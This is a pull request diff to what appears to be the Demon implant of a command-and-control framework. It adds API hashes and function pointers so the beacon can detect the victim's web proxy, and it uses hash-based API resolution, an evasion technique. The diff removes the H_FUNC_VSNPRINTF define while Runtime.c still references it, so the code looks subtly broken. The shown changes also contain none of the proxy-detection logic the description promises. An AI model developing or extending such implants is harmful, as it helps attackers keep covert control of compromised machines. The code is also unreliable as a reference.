### PR TITLE
Add automatic proxy detection

### DIFF
--- a/payloads/Demon/Include/Common/Defines.h
+++ b/payloads/Demon/Include/Common/Defines.h
@@ -134,6 +134,8 @@
 #define H_FUNC_WINHTTPREADDATA                   0x75064b89
 #define H_FUNC_WINHTTPQUERYHEADERS               0xcc1a89c5
 #define H_FUNC_WINHTTPCLOSEHANDLE                0xa7355f15
+#define H_FUNC_WINHTTPGETIEPROXYCONFIGFORCURRENTUSER 0x28197a2
+#define H_FUNC_WINHTTPGETPROXYFORURL             0xa2cf3c6f
 #define H_FUNC_VIRTUALPROTECTEX                  0x5b6b908a
 #define H_FUNC_LOCALALLOC                        0x72073b5b
 #define H_FUNC_LOCALREALLOC                      0x1c44e892
@@ -230,7 +232,6 @@
 #define H_FUNC_SAFEARRAYDESTROY                  0x12b6aed
 #define H_FUNC_SYSALLOCSTRING                    0x3351eb46
 #define H_FUNC_COMMANDLINETOARGVW                0xec6ba0d6
-#define H_FUNC_VSNPRINTF                         0xe212f2ef
 #define H_FUNC_SHOWWINDOW                        0x29bbc91e
 #define H_FUNC_GETSYSTEMMETRICS                  0x287c6401
 #define H_FUNC_GETDC                             0xd2b106c
@@ -278,6 +279,8 @@
 #define H_FUNC_SLEEP                             0xe07cd7e
 #define H_FUNC_CREATETHREAD                      0x98baab11
 #define H_FUNC_AMSISCANBUFFER                    0xbab3d02e
+#define H_FUNC_GLOBALFREE                        0x47886698
+#define H_FUNC_SWPRINTF_S                        0x481aa3d4
 
 
 // Beacon API

--- a/payloads/Demon/Include/Demon.h
+++ b/payloads/Demon/Include/Demon.h
@@ -270,6 +270,7 @@ typedef struct
         WIN_FUNC( DuplicateHandle )
         WIN_FUNC( AttachConsole )
         WIN_FUNC( WriteConsoleA )
+        HGLOBAL ( *GlobalFree ) ( HGLOBAL );
 
         /* WinHttp.dll */
         WIN_FUNC( WinHttpOpen )
@@ -282,6 +283,8 @@ typedef struct
         WIN_FUNC( WinHttpReceiveResponse )
         WIN_FUNC( WinHttpReadData )
         WIN_FUNC( WinHttpQueryHeaders )
+        WIN_FUNC( WinHttpGetIEProxyConfigForCurrentUser )
+        WIN_FUNC( WinHttpGetProxyForUrl )
 
         // Mscoree
         HRESULT ( WINAPI *CLRCreateInstance ) ( REFCLSID clsid, REFIID riid, LPVOID* ppInterface );
@@ -336,6 +339,7 @@ typedef struct
 
         // String Formatting
         INT ( *vsnprintf ) ( PCHAR, SIZE_T, CONST PCHAR, va_list );
+        INT ( *swprintf_s ) ( PWCHAR, SIZE_T, CONST PWCHAR, ... );
 
         // * MISC *
         WIN_FUNC( CommandLineToArgvW )

--- a/payloads/Demon/Source/Core/Runtime.c
+++ b/payloads/Demon/Source/Core/Runtime.c
@@ -220,7 +220,8 @@ BOOL RtMsvcrt(
 
     if ( ( Instance.Modules.Msvcrt = LdrModuleLoad( ModuleName ) ) ) {
         MemZero( ModuleName, sizeof( ModuleName ) );
-        Instance.Win32.vsnprintf = LdrFunctionAddr( Instance.Modules.Msvcrt, H_FUNC_VSNPRINTF );
+        Instance.Win32.vsnprintf  = LdrFunctionAddr( Instance.Modules.Msvcrt, H_FUNC_VSNPRINTF );
+        Instance.Win32.swprintf_s = LdrFunctionAddr( Instance.Modules.Msvcrt, H_FUNC_SWPRINTF_S );
 
         PUTS( "Loaded Msvcrt functions" )
     } else {
@@ -475,16 +476,18 @@ BOOL RtWinHttp(
 
     if ( ( Instance.Modules.WinHttp = LdrModuleLoad( ModuleName ) ) ) {
         MemZero( ModuleName, sizeof( ModuleName ) );
-        Instance.Win32.WinHttpOpen              = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPOPEN );
-        Instance.Win32.WinHttpConnect           = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPCONNECT );
-        Instance.Win32.WinHttpOpenRequest       = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPOPENREQUEST );
-        Instance.Win32.WinHttpSetOption         = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPSETOPTION );
-        Instance.Win32.WinHttpCloseHandle       = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPCLOSEHANDLE );
-        Instance.Win32.WinHttpSendRequest       = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPSENDREQUEST );
-        Instance.Win32.WinHttpAddRequestHeaders = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPADDREQUESTHEADERS );
-        Instance.Win32.WinHttpReceiveResponse   = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPRECEIVERESPONSE );
-        Instance.Win32.WinHttpReadData          = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPREADDATA );
-        Instance.Win32.WinHttpQueryHeaders      = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPQUERYHEADERS );
+        Instance.Win32.WinHttpOpen                           = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPOPEN );
+        Instance.Win32.WinHttpConnect                        = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPCONNECT );
+        Instance.Win32.WinHttpOpenRequest                    = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPOPENREQUEST );
+        Instance.Win32.WinHttpSetOption                      = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPSETOPTION );
+        Instance.Win32.WinHttpCloseHandle                    = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPCLOSEHANDLE );
+        Instance.Win32.WinHttpSendRequest                    = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPSENDREQUEST );
+        Instance.Win32.WinHttpAddRequestHeaders              = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPADDREQUESTHEADERS );
+        Instance.Win32.WinHttpReceiveResponse                = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPRECEIVERESPONSE );
+        Instance.Win32.WinHttpReadData                       = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPREADDATA );
+        Instance.Win32.WinHttpQueryHeaders                   = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPQUERYHEADERS );
+        Instance.Win32.WinHttpGetIEProxyConfigForCurrentUser = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPGETIEPROXYCONFIGFORCURRENTUSER );
+        Instance.Win32.WinHttpGetProxyForUrl                 = LdrFunctionAddr( Instance.Modules.WinHttp, H_FUNC_WINHTTPGETPROXYFORURL );
 
         PUTS( "Loaded WinHttp functions" )
     } else {

--- a/payloads/Demon/Source/Demon.c
+++ b/payloads/Demon/Source/Demon.c
@@ -444,6 +444,7 @@ VOID DemonInit( PVOID ModuleInst, PKAYN_ARGS KArgs )
         Instance.Win32.DuplicateHandle                 = LdrFunctionAddr( Instance.Modules.Kernel32, H_FUNC_DUPLICATEHANDLE );
         Instance.Win32.AttachConsole                   = LdrFunctionAddr( Instance.Modules.Kernel32, H_FUNC_ATTACHCONSOLE );
         Instance.Win32.WriteConsoleA                   = LdrFunctionAddr( Instance.Modules.Kernel32, H_FUNC_WRITECONSOLEA );
+        Instance.Win32.GlobalFree                      = LdrFunctionAddr( Instance.Modules.Kernel32, H_FUNC_GLOBALFREE );
     }
 
     /* now that we loaded some of the basic apis lets parse the config and see how we load the rest */


### PR DESCRIPTION
This pull request will add automatic proxy detection when no static proxy is defined in the beacon configuration. I hope this would make sense? 

Let me know if this could be merged or if I should change something?